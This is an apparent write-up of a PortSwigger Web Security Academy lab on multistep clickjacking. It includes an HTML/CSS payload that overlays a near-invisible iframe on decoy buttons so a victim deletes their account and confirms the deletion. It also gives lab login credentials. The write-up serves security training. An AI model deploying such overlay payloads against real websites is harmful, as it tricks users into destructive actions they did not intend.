# Multistep clickjacking

## Description

[This lab](https://portswigger.net/web-security/clickjacking/lab-multistep) has some account functionality that is protected by a CSRF token and also has a confirmation dialog to protect against clickjacking.

## Reproduction and proof of concept

1. Log in to the account on the target website.
2. Create payload:

* The iframe `src` URL points to the target website vulnerable page. In this case, the target website's user account page, and depends on the unique `lab-id`.
* An initial opacity of 0.1 to align the iframe actions and adjust the position values.
* Initial `$top_value1` and `$side_value1` values of resp `330px` and `50px` to align the "Delete account" button with the "Test me first" decoy action.
* Initial `$top_value2` and `$side_value2` variables of resp. `285px` and `225px` to align the "Test me next" decoy action with the "Yes" button on the confirmation page. 

```text
<style>
	iframe {
		position:relative;
		width:$width_value;
		height: $height_value;
		opacity: $opacity;
		z-index: 2;
	}
   .firstClick, .secondClick {
		position:absolute;
		top:$top_value1;
		left:$side_value1;
		z-index: 1;
	}
   .secondClick {
		top:$top_value2;
		left:$side_value2;
	}
</style>
<div class="firstClick">Test me first</div>
<div class="secondClick">Test me next</div>
<iframe src="lab-id.web-security-academy.net/my-account"></iframe>
```

3. Go to the exploit server and paste the payload into the `body` field of the form.
4. Click **Store** and then **View exploit**. Hover over "firstClick" to make sure the cursor changes to a hand indicating that the `div` element is positioned correctly. If it is not, adjust the position of the div element by modifying the top and left properties inside the `firstClick` class of the style sheet. 
5. Click **Test me first** then hover over **Test me next** and ensure the cursor changes to a hand indicating that the div element is positioned correctly. If it is not, adjust the position of the div element by modifying the `top` and `left` properties inside the `secondClick` class of the style sheet. 
5. Change "Test me first" to "Click me first", "Test me next" to "Click me next", set `opacity` to `0.0001`, and click **Store**.
6. **Deliver exploit to victim**

## Exploitability

An attacker needs to construct an attack that fools the user into clicking the delete account button and the confirmation dialog by clicking on "Click me first" and "Click me next" decoy actions. The attacker will need to use two elements. An account is available with credentials `wiener:peter`.  _Note: The victim will be using Chrome so test the exploit on that browser._
